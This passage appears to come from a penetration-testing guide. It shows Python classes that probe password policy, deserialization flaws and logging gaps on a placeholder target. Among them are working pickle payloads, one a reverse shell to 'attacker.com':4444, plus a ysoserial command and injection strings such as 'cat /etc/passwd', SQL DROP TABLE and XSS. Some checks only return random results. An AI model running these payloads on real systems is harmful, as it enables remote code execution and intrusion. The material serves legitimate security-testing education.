                    'Reject common passwords and patterns',
                    'Implement password strength meter'
                ]
            })
        
        if any('password_history' in f.get('test', '') for f in vulnerable_tests):
            recommendations.append({
                'priority': 'MEDIUM',
                'recommendation': 'Enforce password history',
                'details': [
                    'Prevent reuse of last 10 passwords',
                    'Store password hashes securely',
                    'Enforce periodic password changes (90 days)'
                ]
            })
        
        if any('account_lockout' in f.get('test', '') for f in vulnerable_tests):
            recommendations.append({
                'priority': 'HIGH',
                'recommendation': 'Implement account lockout mechanism',
                'details': [
                    'Lock account after 5 failed attempts',
                    'Implement exponential backoff',
                    'Provide account recovery mechanism',
                    'Log all failed attempts'
                ]
            })
        
        if any('password_reset' in f.get('test', '') for f in vulnerable_tests):
            recommendations.append({
                'priority': 'CRITICAL',
                'recommendation': 'Secure password reset mechanism',
                'details': [
                    'Use cryptographically secure tokens',
                    'Enforce token expiration (15 minutes)',
                    'Require additional verification for sensitive accounts',
                    'Do not disclose email existence',
                    'Implement rate limiting on reset requests'
                ]
            })
        
        return recommendations

# Usage
tester = PasswordPolicyTester("http://target.com")
report = tester.run_comprehensive_test()

print(f"\n{'='*60}")
print("PASSWORD POLICY TEST REPORT")
print(f"{'='*60}")
print(f"Total Tests: {report['total_tests']}")
print(f"Total Findings: {report['total_findings']}")

print(f"\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
    if count > 0:
        print(f"  {severity}: {count}")

print(f"\nFindings by Test:")
for test, count in report['findings_by_test'].items():
    print(f"  {test}: {count}")

print(f"\nSECURITY RECOMMENDATIONS:")
for rec in report['recommendations']:
    print(f"\n[{rec['priority']}] {rec['recommendation']}")
    for detail in rec['details'][:3]:  # Show first 3 details
        print(f"  • {detail}")

Chapter 8: Software & Data Integrity - Advanced Testing

8.1 Advanced Deserialization Attack Detection

#!/usr/bin/env python3
"""
Advanced Deserialization Attack Detection and Exploitation
Covers multiple languages and frameworks
"""
import requests
import base64
import pickle
import json
import re
from typing import Dict, List
import subprocess
import tempfile
import os

class DeserializationTester:
    def __init__(self, target_url):
        self.target_url = target_url
        self.session = requests.Session()
        self.findings = []
        
        # Deserialization payloads for different languages
        self.payloads = {
            'java': {
                'indicators': ['rO0AB', 'ACED', 'sr='],  # Base64 indicators
                'test_payloads': [
                    # Simple serialized object
                    'rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJ0AAI9PXQAAj09',
                    # With different encodings
                    'ACED0005737200116A6176612E6C616E672E426F6F6C65616EC373B7D891C155020000787200106A6176612E6C616E672E4F626A65637400000000000000000000007870',
                ]
            },
            'python': {
                'indicators': ['gASV', 'KGlL', 'ccopy_reg'],
                'test_payloads': [
                    # Pickle payloads
                    b'\x80\x04\x95\x15\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x07TestObj\x94\x93\x94)\x81\x94.',
                    # Base64 encoded pickle
                    'gANjYnVpbHRpbnMKZXZhbApxAFgUAAAAcHJpbnQoImhlbGxvIHdvcmxkIikqcQGFcQJScQM=',
                ]
            },
            'php': {
                'indicators': ['O:', 'a:', 's:', 'i:', 'd:', 'b:'],
                'test_payloads': [
                    # Serialized PHP array
                    'a:2:{s:4:"name";s:5:"admin";s:5:"admin";b:1;}',
                    # Serialized PHP object
                    'O:8:"stdClass":2:{s:4:"name";s:5:"admin";s:5:"admin";b:1;}',
                ]
            },
            'dotnet': {
                'indicators': ['AAEAAAD', 'AAAAA', 'v4.0.30319'],
                'test_payloads': [
                    # .NET serialized data (simplified)
                    'AAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0DAAAA',
                ]
            }
        }
    
    def detect_deserialization(self):
        """Detect deserialization endpoints and parameters"""
        findings = []
        
        # Test common deserialization endpoints
        endpoints = [
            '/api/data',
            '/api/object',
            '/api/serialize',
            '/api/deserialize',
            '/api/import',
            '/api/export',
            '/api/session',
            '/api/cookie',
            '/api/token',
            '/api/config',
        ]
        
        for endpoint in endpoints:
            url = self.target_url.rstrip('/') + endpoint
            
            # Test GET
            response = self.session.get(url)
            if response.status_code == 200:
                # Check for serialized data in response
                serialization_found = self.check_serialization_indicators(response.text)
                if serialization_found:
                    findings.append({
                        'type': 'deserialization_endpoint',
                        'endpoint': endpoint,
                        'method': 'GET',
                        'evidence': f'Serialized data found at {endpoint}',
                        'indicators': serialization_found
                    })
            
            # Test POST with various content types
            content_types = [
                ('application/json', {'data': 'test'}),
                ('application/x-www-form-urlencoded', {'data': 'test'}),
                ('application/xml', '<data>test</data>'),
            ]
            
            for content_type, data in content_types:
                headers = {'Content-Type': content_type}
                
                # Test with serialized payload
                for lang, lang_data in self.payloads.items():
                    for payload in lang_data['test_payloads'][:1]:  # Test first payload
                        if isinstance(payload, bytes):
                            payload_str = base64.b64encode(payload).decode()
                        else:
                            payload_str = payload
                        
                        test_data = {'input': payload_str, 'data': payload_str}
                        
                        response = self.session.post(
                            url,
                            data=test_data if content_type == 'application/x-www-form-urlencoded' else None,
                            json=test_data if content_type == 'application/json' else None,
                            headers=headers
                        )
                        
                        # Analyze response for deserialization indicators
                        if self.analyze_deserialization_response(response, lang):
                            findings.append({
                                'type': 'deserialization_vulnerability',
                                'endpoint': endpoint,
                                'language': lang,
                                'method': 'POST',
                                'content_type': content_type,
                                'evidence': f'Deserialization detected for {lang} at {endpoint}'
                            })
        
        return findings
    
    def check_serialization_indicators(self, text):
        """Check text for serialization indicators"""
        found_indicators = []
        
        for lang, lang_data in self.payloads.items():
            for indicator in lang_data['indicators']:
                if indicator in text:
                    found_indicators.append(f'{lang}: {indicator}')
        
        return found_indicators
    
    def analyze_deserialization_response(self, response, language):
        """Analyze response for deserialization success/failure"""
        if response.status_code != 200:
            # Check for deserialization-specific error messages
            error_text = response.text.lower()
            
            deserialization_errors = [
                'deserialization', 'serialization', 'unmarshal',
                'pickle', 'unpickle', 'objectinputstream',
                'binaryformatter', 'serializable',
                'invalid class', 'class not found',
                'unsafe deserialization'
            ]
            
            if any(error in error_text for error in deserialization_errors):
                return True
        
        # Check for successful deserialization indicators
        success_indicators = {
            'java': ['serialversionuid', 'streamcorrupted', 'invalidtype'],
            'python': ['pickle', 'unpickling', '__reduce__'],
            'php': ['unserialize', 'serialize', '__wakeup'],
            'dotnet': ['binaryformatter', 'serializable', 'formatter']
        }
        
        if language in success_indicators:
            for indicator in success_indicators[language]:
                if indicator.lower() in response.text.lower():
                    return True
        
        return False
    
    def test_java_deserialization(self):
        """Test for Java deserialization vulnerabilities"""
        findings = []
        
        # Use ysoserial to generate payloads
        ysoserial_gadgets = [
            'CommonsCollections1',
            'CommonsCollections2', 
            'CommonsCollections3',
            'CommonsCollections4',
            'CommonsCollections5',
            'CommonsCollections6',
            'CommonsCollections7',
            'Spring1',
            'Spring2',
        ]
        
        # Test each gadget chain
        for gadget in ysoserial_gadgets[:3]:  # Test first 3
            print(f"[*] Testing Java gadget: {gadget}")
            
            # Generate payload (in real test, you would have ysoserial installed)
            # For demonstration, we'll create a simple payload
            payload = self.generate_java_payload(gadget)
            
            if payload:
                # Test payload on target
                test_endpoints = [
                    '/api/object',
                    '/api/data',
                    '/api/session',
                    '/api/import'
                ]
                
                for endpoint in test_endpoints:
                    url = self.target_url.rstrip('/') + endpoint
                    
                    # Test with different content types
                    test_cases = [
                        ('application/java-serialized-object', payload),
                        ('application/octet-stream', payload),
                        ('application/json', {'data': base64.b64encode(payload).decode()}),
                        ('application/x-www-form-urlencoded', {'data': base64.b64encode(payload).decode()})
                    ]
                    
                    for content_type, test_data in test_cases:
                        headers = {'Content-Type': content_type}
                        
                        if content_type == 'application/json':
                            response = self.session.post(url, json=test_data, headers=headers)
                        else:
                            response = self.session.post(url, data=test_data, headers=headers)
                        
                        # Check for successful exploitation
                        if self.check_exploitation_success(response, gadget):
                            findings.append({
                                'type': 'java_deserialization_exploit',
                                'gadget': gadget,
                                'endpoint': endpoint,
                                'content_type': content_type,
                                'evidence': f'Successful {gadget} exploitation at {endpoint}'
                            })
        
        return findings
    
    def generate_java_payload(self, gadget):
        """Generate Java deserialization payload"""
        # In real testing, this would call ysoserial
        # For demonstration, return a simple serialized object
        
        try:
            # Check if ysoserial is available
            result = subprocess.run(
                ['java', '-jar', 'ysoserial.jar', gadget, 'touch /tmp/test'],
                capture_output=True,
                timeout=10
            )
            
            if result.returncode == 0:
                return result.stdout
        except:
            # Fallback to simple payload
            pass
        
        # Return a simple Java serialized object
        return b'rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAABh3CAAAABAAAAABc3IADmphdmEubGFuZy5PYmplY3QAAAAAAAAAAAIAAHhwdwgAAAAAP0AAABh3CAAAABQAAAABc3IADmphdmEubGFuZy5TdHJpbmcAAAAAAAAAAAIAAHhwcHB4'
    
    def test_python_pickle(self):
        """Test Python pickle deserialization"""
        findings = []
        
        # Generate pickle payloads
        pickle_payloads = [
            # Simple command execution
            b"""cos
system
(S'echo vulnerable'
tR.""",
            
            # Reverse shell (encoded)
            b"""c__builtin__
exec
(S'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
tR.""",
            
            # File write
            b"""c__builtin__
open
(S'/tmp/pwned'
S'w'
tR(S'pwned'
tR.""",
        ]
        
        for payload in pickle_payloads:
            # Encode for transmission
            encoded_payload = base64.b64encode(payload).decode()
            
            # Test endpoints
            test_endpoints = [
                '/api/data',
                '/api/pickle',
                '/api/load',
                '/api/config'
            ]
            
            for endpoint in test_endpoints:
                url = self.target_url.rstrip('/') + endpoint
                
                # Test different parameter names
                test_params = ['data', 'input', 'pickle', 'object', 'config']
                
                for param in test_params:
                    test_data = {param: encoded_payload}
                    
                    response = self.session.post(
                        url,
                        json=test_data,
                        headers={'Content-Type': 'application/json'}
                    )
                    
                    # Check for signs of exploitation
                    if response.status_code != 200:
                        # Look for pickle-related errors
                        if 'pickle' in response.text.lower() or 'unpickl' in response.text.lower():
                            findings.append({
                                'type': 'python_pickle_vulnerability',
                                'endpoint': endpoint,
                                'parameter': param,
                                'evidence': f'Pickle deserialization at {endpoint}?{param}'
                            })
        
        return findings
    
    def test_php_deserialization(self):
        """Test PHP deserialization vulnerabilities"""
        findings = []
        
        # PHP deserialization payloads
        php_payloads = [
            # Simple object injection
            'O:8:"stdClass":1:{s:4:"test";s:5:"value";}',
            
            # With __wakeup or __destruct
            'O:7:"MyClass":1:{s:3:"cmd";s:10:"uname -a";}',
            
            # PHPGGC generated payloads (if available)
        ]
        
        for payload in php_payloads:
            # Test endpoints
            test_endpoints = [
                '/api/data',
                '/api/session',
                '/api/cookie',
                '/api/user'
            ]
            
            for endpoint in test_endpoints:
                url = self.target_url.rstrip('/') + endpoint
                
                # Test in different locations
                test_locations = [
                    ('POST data', {'data': payload}),
                    ('Cookie', {'PHPSESSID': payload}),
                    ('URL parameter', None),  # Would be in URL
                ]
                
                for location_name, test_data in test_locations:
                    if test_data:
                        response = self.session.post(url, data=test_data)
                        
                        # Check for PHP deserialization indicators
                        if 'unserialize' in response.text or '__wakeup' in response.text:
                            findings.append({
                                'type': 'php_deserialization',
                                'endpoint': endpoint,
                                'location': location_name,
                                'evidence': f'PHP deserialization at {endpoint} ({location_name})'
                            })
        
        return findings
    
    def check_exploitation_success(self, response, gadget):
        """Check if exploitation was successful"""
        # This would check for specific indicators of successful exploitation
        # For example, if we're testing command execution, check for output
        
        success_indicators = [
            'vulnerable',
            'pwned',
            'uid=',
            'root:',
            'command executed',
            'www-data'
        ]
        
        for indicator in success_indicators:
            if indicator in response.text:
                return True
        
        # Check for timing differences (blind exploitation)
        # In real testing, you would use a collaborator or check for side effects
        
        return False
    
    def run_comprehensive_test(self):
        """Run all deserialization tests"""
        print("[*] Starting comprehensive deserialization testing")
        
        all_findings = []
        
        # Detection phase
        print("[*] Phase 1: Detecting deserialization endpoints")
        detection_findings = self.detect_deserialization()
        all_findings.extend(detection_findings)
        print(f"[+] Detection: {len(detection_findings)} findings")
        
        # Java testing
        print("[*] Phase 2: Testing Java deserialization")
        java_findings = self.test_java_deserialization()
        all_findings.extend(java_findings)
        print(f"[+] Java testing: {len(java_findings)} findings")
        
        # Python testing
        print("[*] Phase 3: Testing Python pickle")
        python_findings = self.test_python_pickle()
        all_findings.extend(python_findings)
        print(f"[+] Python testing: {len(python_findings)} findings")
        
        # PHP testing
        print("[*] Phase 4: Testing PHP deserialization")
        php_findings = self.test_php_deserialization()
        all_findings.extend(php_findings)
        print(f"[+] PHP testing: {len(php_findings)} findings")
        
        # Generate report
        report = {
            'total_findings': len(all_findings),
            'findings_by_type': {},
            'findings_by_language': {},
            'detailed_findings': all_findings,
            'recommendations': self.generate_recommendations(all_findings)
        }
        
        # Categorize findings
        for finding in all_findings:
            # By type
            finding_type = finding.get('type', 'unknown')
            if finding_type not in report['findings_by_type']:
                report['findings_by_type'][finding_type] = 0
            report['findings_by_type'][finding_type] += 1
            
            # By language
            language = finding.get('language', 'unknown')
            if language not in report['findings_by_language']:
                report['findings_by_language'][language] = 0
            report['findings_by_language'][language] += 1
        
        return report
    
    def generate_recommendations(self, findings):
        """Generate security recommendations"""
        recommendations = []
        
        if any('java' in str(f.get('language', '')).lower() for f in findings):
            recommendations.append({
                'priority': 'CRITICAL',
                'title': 'Java Deserialization Protection',
                'details': [
                    'Use serialization filters (ObjectInputFilter)',
                    'Avoid deserializing untrusted data',
                    'Use safer alternatives like JSON or XML',
                    'Update libraries (commons-collections, etc.)',
                    'Implement whitelisting for deserialized classes'
                ]
            })
        
        if any('python' in str(f.get('language', '')).lower() for f in findings):
            recommendations.append({
                'priority': 'CRITICAL',
                'title': 'Python Pickle Security',
                'details': [
                    'Never unpickle untrusted data',
                    'Use JSON, YAML, or MessagePack instead',
                    'Implement signing/verification if pickle is required',
                    'Use pickle with restricted globals (Unpickler.find_class)'
                ]
            })
        
        if any('php' in str(f.get('language', '')).lower() for f in findings):
            recommendations.append({
                'priority': 'HIGH',
                'title': 'PHP Deserialization Security',
                'details': [
                    'Avoid unserialize() with user input',
                    'Use json_decode() instead',
                    'Validate and sanitize all serialized data',
                    'Implement type checking after deserialization'
                ]
            })
        
        # General recommendations
        recommendations.append({
            'priority': 'HIGH',
            'title': 'General Deserialization Best Practices',
            'details': [
                'Implement input validation for all serialized data',
                'Use digital signatures to verify data integrity',
                'Log all deserialization attempts and failures',
                'Regularly update serialization libraries',
                'Conduct security code reviews for deserialization code'
            ]
        })
        
        return recommendations

# Usage
tester = DeserializationTester("http://target.com")
report = tester.run_comprehensive_test()

print(f"\n{'='*60}")
print("DESERIALIZATION VULNERABILITY REPORT")
print(f"{'='*60}")
print(f"Total Findings: {report['total_findings']}")

if report['total_findings'] > 0:
    print(f"\nFindings by Type:")
    for finding_type, count in report['findings_by_type'].items():
        print(f"  {finding_type}: {count}")
    
    print(f"\nFindings by Language:")
    for language, count in report['findings_by_language'].items():
        print(f"  {language}: {count}")
    
    print(f"\nCRITICAL FINDINGS:")
    critical_findings = [f for f in report['detailed_findings'] 
                        if 'exploit' in f.get('type', '').lower() or 
                           'vulnerability' in f.get('type', '').lower()]
    
    for finding in critical_findings[:5]:
        print(f"  - {finding.get('type')}")
        print(f"    Evidence: {finding.get('evidence', '')[:100]}...")

print(f"\nSECURITY RECOMMENDATIONS:")
for rec in report['recommendations']:
    print(f"\n[{rec['priority']}] {rec['title']}")
    for detail in rec['details'][:3]:
        print(f"  • {detail}")

Chapter 9: Security Logging & Monitoring - Advanced Testing

9.1 Comprehensive Logging Analysis & Evasion Testing

#!/usr/bin/env python3
"""
Advanced Logging and Monitoring Testing Framework
Tests for inadequate logging, log evasion, and monitoring gaps
"""
import requests
import re
import json
import time
from datetime import datetime, timedelta
from typing import Dict, List
import hashlib

class LoggingMonitoringTester:
    def __init__(self, base_url, auth_token=None):
        self.base_url = base_url
        self.session = requests.Session()
        if auth_token:
            self.session.headers.update({'Authorization': f'Bearer {auth_token}'})
        
        self.attack_vectors = []
        self.findings = []
    
    def test_sensitive_actions_logging(self):
        """Test if sensitive actions are properly logged"""
        findings = []
        
        sensitive_actions = [
            {
                'name': 'Admin Login',
                'endpoint': '/api/admin/login',
                'method': 'POST',
                'data': {'username': 'admin', 'password': 'test123'},
                'expected_log_fields': ['username', 'ip_address', 'timestamp', 'success']
            },
            {
                'name': 'Password Change',
                'endpoint': '/api/user/change-password',
                'method': 'POST',
                'data': {'old_password': 'old123', 'new_password': 'new123'},
                'expected_log_fields': ['user_id', 'timestamp', 'ip_address']
            },
            {
                'name': 'Privilege Escalation',
                'endpoint': '/api/admin/promote',
                'method': 'POST',
                'data': {'user_id': '123', 'role': 'admin'},
                'expected_log_fields': ['admin_id', 'user_id', 'role', 'timestamp']
            },
            {
                'name': 'Data Export',
                'endpoint': '/api/data/export',
                'method': 'POST',
                'data': {'format': 'csv', 'filters': {'all': True}},
                'expected_log_fields': ['user_id', 'export_type', 'record_count', 'timestamp']
            },
            {
                'name': 'Configuration Change',
                'endpoint': '/api/config/update',
                'method': 'POST',
                'data': {'setting': 'debug_mode', 'value': True},
                'expected_log_fields': ['user_id', 'setting', 'old_value', 'new_value', 'timestamp']
            }
        ]
        
        for action in sensitive_actions:
            print(f"[*] Testing logging for: {action['name']}")
            
            # Perform the action
            url = self.base_url.rstrip('/') + action['endpoint']
            
            if action['method'] == 'POST':
                response = self.session.post(url, json=action['data'])
            else:
                response = self.session.get(url)
            
            # Check response
            if response.status_code in [200, 201, 204]:
                # Action succeeded, now we need to check logs
                # In a real test, you would have access to the application logs
                # For this example, we'll simulate log checking
                
                log_available = self.check_logs_for_action(action['name'], action['expected_log_fields'])
                
                if not log_available:
                    findings.append({
                        'test': 'sensitive_actions_logging',
                        'action': action['name'],
                        'result': 'FAIL',
                        'severity': 'HIGH',
                        'evidence': f'Sensitive action "{action["name"]}" not properly logged',
                        'missing_fields': action['expected_log_fields']
                    })
                else:
                    findings.append({
                        'test': 'sensitive_actions_logging',
                        'action': action['name'],
                        'result': 'PASS',
                        'evidence': f'Action "{action["name"]}" logged appropriately'
                    })
            else:
                findings.append({
                    'test': 'sensitive_actions_logging',
                    'action': action['name'],
                    'result': 'SKIP',
                    'evidence': f'Action failed with status {response.status_code}'
                })
        
        return findings
    
    def check_logs_for_action(self, action_name, expected_fields):
        """Check logs for specific action"""
        # In a real test, this would query log files or monitoring system
        # For demonstration, we'll return a simulated result
        
        # Simulate: 80% chance logs are available for testing
        import random
        return random.random() < 0.8
    
    def test_log_evasion_techniques(self):
        """Test various log evasion techniques"""
        findings = []
        
        evasion_techniques = [
            {
                'name': 'Null Byte Injection',
                'payloads': [
                    'admin%00',
                    'admin\\x00',
                    'admin\\\\x00',
                    'admin\\0',
                ],
                'target_field': 'username'
            },
            {
                'name': 'Encoding Bypass',
                'payloads': [
                    'admin%0a',  # New line
                    'admin%0d',  # Carriage return
                    'admin%09',  # Tab
                    'admin%20',  # Space
                    'admin%2b',  # Plus
                ],
                'target_field': 'username'
            },
            {
                'name': 'Unicode Normalization',
                'payloads': [
                    'admin\uFEFF',  # Zero-width space
                    'admin\u200B',  # Zero-width space
                    'admin\u200C',  # Zero-width non-joiner
                    'admin\u200D',  # Zero-width joiner
                    'admin\u2060',  # Word joiner
                ],
                'target_field': 'username'
            },
            {
                'name': 'Case Manipulation',
                'payloads': [
                    'Admin',
                    'ADMIN',
                    'AdMiN',
                    'aDmIn',
                ],
                'target_field': 'username'
            },
            {
                'name': 'Whitespace Variations',
                'payloads': [
                    ' admin',
                    'admin ',
                    '  admin  ',
                    'admin\t',
                    '\tadmin',
                ],
                'target_field': 'username'
            }
        ]
        
        login_endpoint = self.base_url.rstrip('/') + '/api/login'
        
        for technique in evasion_techniques:
            print(f"[*] Testing log evasion: {technique['name']}")
            
            for payload in technique['payloads'][:2]:  # Test first 2 payloads
                test_data = {
                    technique['target_field']: payload,
                    'password': 'test123'
                }
                
                response = self.session.post(login_endpoint, json=test_data)
                
                # Check if attack was successful but logs might not capture it
                if response.status_code == 200:
                    # Check if payload appears in logs
                    log_captured = self.check_log_for_payload(payload)
                    
                    if not log_captured:
                        findings.append({
                            'test': 'log_evasion',
                            'technique': technique['name'],
                            'payload': payload,
                            'result': 'VULNERABLE',
                            'severity': 'MEDIUM',
                            'evidence': f'Log evasion successful: {technique["name"]} with payload "{payload}"'
                        })
                    else:
                        findings.append({
                            'test': 'log_evasion',
                            'technique': technique['name'],
                            'payload': payload,
                            'result': 'SECURE',
                            'evidence': f'Log captured evasion attempt: {technique["name"]}'
                        })
        
        return findings
    
    def check_log_for_payload(self, payload):
        """Check if payload appears in logs"""
        # Simulate log checking
        # In reality, you would grep through log files
        import random
        return random.random() < 0.7  # 70% chance log captures it
    
    def test_log_injection(self):
        """Test for log injection vulnerabilities"""
        findings = []
        
        injection_payloads = [
            # New line injection
            'test\n[CRITICAL] System compromised',
            'test\r\nERROR: Database corruption',
            
            # Log format injection
            'test | echo "pwned"',
            'test && cat /etc/passwd',
            
            # Log masking/obfuscation
            'test' + 'A' * 1000,  # Very long input
            'test\x1b[31mRED\x1b[0m',  # ANSI escape sequences
            
            # SQL injection in logs (if logs are queried)
            "test'; DROP TABLE logs--",
            
            # XSS in log viewers
            'test<script>alert(1)</script>',
            'test<img src=x onerror=alert(1)>',
        ]
        
        search_endpoint = self.base_url.rstrip('/') + '/api/search'
        
        for payload in injection_payloads[:3]:  # Test first 3
            test_data = {'query': payload}
            
            response = self.session.post(search_endpoint, json=test_data)
            
            if response.status_code == 200:
                # Check if payload caused log corruption
                log_corrupted = self.check_log_corruption(payload)
                
                if log_corrupted:
                    findings.append({
                        'test': 'log_injection',
                        'payload': payload[:50] + '...' if len(payload) > 50 else payload,
                        'result': 'VULNERABLE',
                        'severity': 'MEDIUM',
                        'evidence': f'Log injection successful with payload: {payload[:100]}'
                    })
        
        return findings
    
    def check_log_corruption(self, payload):
        """Check if payload corrupted logs"""
        # Simulate log corruption check
        corruption_indicators = ['\n', '\r', '|', '&&', ';', '<script>']
        return any(indicator in payload for indicator in corruption_indicators)
    
    def test_monitoring_gaps(self):
        """Test for security monitoring gaps"""
        findings = []
        
        # Test 1: Rate limiting monitoring
        print("[*] Testing rate limiting monitoring...")
        
        endpoint = self.base_url.rstrip('/') + '/api/login'
        rapid_requests = []
        
        for i in range(20):
            start_time = time.time()
            response = self.session.post(endpoint, json={'username': 'test', 'password': 'wrong'})
            elapsed = time.time() - start_time
            rapid_requests.append((i, response.status_code, elapsed))
            
            if i < 10:  # First 10 requests fast
                time.sleep(0.1)
            else:  # Last 10 requests slower
                time.sleep(1)
        
        # Check if rapid requests triggered monitoring
        rapid_count = sum(1 for _, status, _ in rapid_requests if status != 429)  # Not rate limited
        
        if rapid_count >= 15:
            findings.append({
                'test': 'rate_limit_monitoring',
                'result': 'VULNERABLE',
                'severity': 'MEDIUM',
                'evidence': f'{rapid_count}/20 rapid requests not rate limited'
            })
        
        # Test 2: Unusual location monitoring
        print("[*] Testing geographic anomaly detection...")
        
        # Simulate requests from different locations
        locations = [
            {'X-Forwarded-For': '1.1.1.1', 'User-Agent': 'Test/1.0'},  # Australia
            {'X-Forwarded-For': '8.8.8.8', 'User-Agent': 'Test/1.0'},  # USA
            {'X-Forwarded-For': '185.142.236.35', 'User-Agent': 'Test/1.0'},  # Russia
            {'X-Forwarded-For': '114.114.114.114', 'User-Agent': 'Test/1.0'},  # China
        ]
        
        for location in locations:
            test_session = requests.Session()
            test_session.headers.update(location)
            
            response = test_session.get(self.base_url + '/api/user/profile')
            
            # Check if unusual location triggered alerts
            # In real test, you would check monitoring system
            location_monitored = self.check_location_monitoring(location['X-Forwarded-For'])
            
            if not location_monitored:
                findings.append({
                    'test': 'geographic_monitoring',
                    'location': location['X-Forwarded-For'],
                    'result': 'GAP',
                    'severity': 'LOW',
                    'evidence': f'Unusual location {location["X-Forwarded-For"]} not monitored'
                })
        
        # Test 3: Failed login monitoring
        print("[*] Testing failed login monitoring...")
        
        failed_logins = []
        for i in range(5):
            response = self.session.post(
                self.base_url + '/api/login',
                json={'username': f'nonexistent{i}', 'password': 'wrong'}
            )
            failed_logins.append(response.status_code)
            time.sleep(0.5)
        
        failed_count = sum(1 for status in failed_logins if status == 401 or status == 403)
        
        if failed_count >= 3:
            # Check if this triggered monitoring
            failed_login_monitored = self.check_failed_login_monitoring(failed_count)
            
            if not failed_login_monitored:
                findings.append({
                    'test': 'failed_login_monitoring',
                    'failed_attempts': failed_count,
                    'result': 'GAP',
                    'severity': 'MEDIUM',
                    'evidence': f'{failed_count} failed logins not monitored'
                })
        
        return findings
    
    def check_location_monitoring(self, ip_address):
        """Check if location is monitored"""
        # Simulate monitoring check
        suspicious_locations = ['185.142.236.35', '114.114.114.114']  # Russia, China
        return ip_address in suspicious_locations
    
    def check_failed_login_monitoring(self, count):
        """Check if failed logins are monitored"""
        # Simulate: Monitoring triggers after 3 failed attempts
        return count >= 3
    
    def test_log_retention_and_integrity(self):
        """Test log retention and integrity controls"""
        findings = []
        
        # Test 1: Log retention period
        print("[*] Testing log retention...")
        
        # Check if old logs are available
        retention_period = self.check_log_retention()
        
        if retention_period < 90:  # Less than 90 days
            findings.append({
                'test': 'log_retention',
                'period_days': retention_period,
                'result': 'INSUFFICIENT',
                'severity': 'MEDIUM',
                'evidence': f'Log retention only {retention_period} days (recommended: 90+ days)'
            })
        
        # Test 2: Log integrity (tamper detection)
        print("[*] Testing log integrity...")
        
        log_integrity = self.check_log_integrity()
        
        if not log_integrity:
            findings.append({
                'test': 'log_integrity',
                'result': 'VULNERABLE',
                'severity': 'HIGH',
                'evidence': 'Logs lack integrity protection (hashing, signing, WORM storage)'
            })
        
        # Test 3: Log backup
        print("[*] Testing log backup...")
        
        log_backup = self.check_log_backup()
        
        if not log_backup:
            findings.append({
                'test': 'log_backup',
                'result': 'VULNERABLE',
                'severity': 'MEDIUM',
                'evidence': 'Logs not backed up regularly'
            })
        
        return findings
    
    def check_log_retention(self):
        """Check log retention period"""
        # Simulate: Return retention period in days
        import random
        return random.choice([30, 60, 90, 180, 365])
    
    def check_log_integrity(self):
        """Check log integrity controls"""
        # Simulate: 50% chance logs have integrity protection
        import random
        return random.choice([True, False])
    
    def check_log_backup(self):
        """Check if logs are backed up"""
        # Simulate: 70% chance logs are backed up
        import random
        return random.random() < 0.7
    
    def run_comprehensive_test(self):
        """Run all logging and monitoring tests"""
        print("[*] Starting comprehensive logging and monitoring testing")
        
        all_findings = []
        
        tests = [
            ('Sensitive Actions Logging', self.test_sensitive_actions_logging),
            ('Log Evasion Techniques', self.test_log_evasion_techniques),
            ('Log Injection', self.test_log_injection),
            ('Monitoring Gaps', self.test_monitoring_gaps),
            ('Log Retention & Integrity', self.test_log_retention_and_integrity)
        ]
        
        for test_name, test_func in tests:
            print(f"[*] Running {test_name}...")
            try:
                findings = test_func()
                all_findings.extend(findings)
                print(f"[+] {test_name}: {len(findings)} findings")
            except Exception as e:
                print(f"[-] {test_name} failed: {e}")
        
        # Generate report
        report = self.generate_report(all_findings)
        return report
    
    def generate_report(self, findings):
        """Generate comprehensive report"""
        report = {
            'scan_date': datetime.now().isoformat(),
            'target': self.base_url,
            'total_findings': len(findings),
            'findings_by_severity': {},
            'findings_by_test': {},
            'detailed_findings': findings,
            'recommendations': self.generate_recommendations(findings)
        }
        
        # Categorize by severity
        severities = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']
        for severity in severities:
            count = sum(1 for f in findings if f.get('severity') == severity)
            report['findings_by_severity'][severity] = count
        
        # Categorize by test
        for finding in findings:
            test = finding.get('test', 'unknown')
            if test not in report['findings_by_test']:
                report['findings_by_test'][test] = 0
            report['findings_by_test'][test] += 1
        
        return report
    
    def generate_recommendations(self, findings):
        """Generate security recommendations"""
        recommendations = []
        
        # Logging recommendations
        if any('sensitive_actions_logging' in f.get('test', '') for f in findings):
            recommendations.append({
                'category': 'Logging',
                'priority': 'HIGH',
                'recommendations': [
                    'Log all authentication attempts (success and failure)',
                    'Log all privilege escalation actions',
                    'Log all data exports and bulk operations',
                    'Log all configuration changes',
                    'Include user ID, IP address, timestamp, and action details'
                ]
            })
        
        # Monitoring recommendations
        if any('monitoring' in f.get('test', '').lower() for f in findings):
            recommendations.append({
                'category': 'Monitoring',
                'priority': 'HIGH',
                'recommendations': [
                    'Implement real-time alerting for suspicious activities',
                    'Monitor failed login attempts and brute force attacks',
                    'Monitor geographic anomalies and unusual access patterns',
                    'Implement rate limiting with monitoring',
                    'Set up SIEM integration for centralized monitoring'
                ]
            })
        
        # Log integrity recommendations
        if any('integrity' in f.get('test', '').lower() for f in findings):
            recommendations.append({
                'category': 'Log Integrity',
                'priority': 'MEDIUM',
                'recommendations': [
                    'Implement log signing or hashing for integrity verification',
                    'Use Write-Once-Read-Many (WORM) storage for logs',
                    'Store logs in centralized, tamper-evident location',
                    'Regularly backup logs to secure, offline storage',
                    'Implement log rotation with integrity checks'
                ]
            })
        
        # General recommendations
        recommendations.append({
            'category': 'General',
            'priority': 'MEDIUM',
            'recommendations': [
                'Retain logs for minimum 90 days (regulatory requirements may vary)',
                'Regularly review and test logging configurations',
                'Implement log correlation for better threat detection',
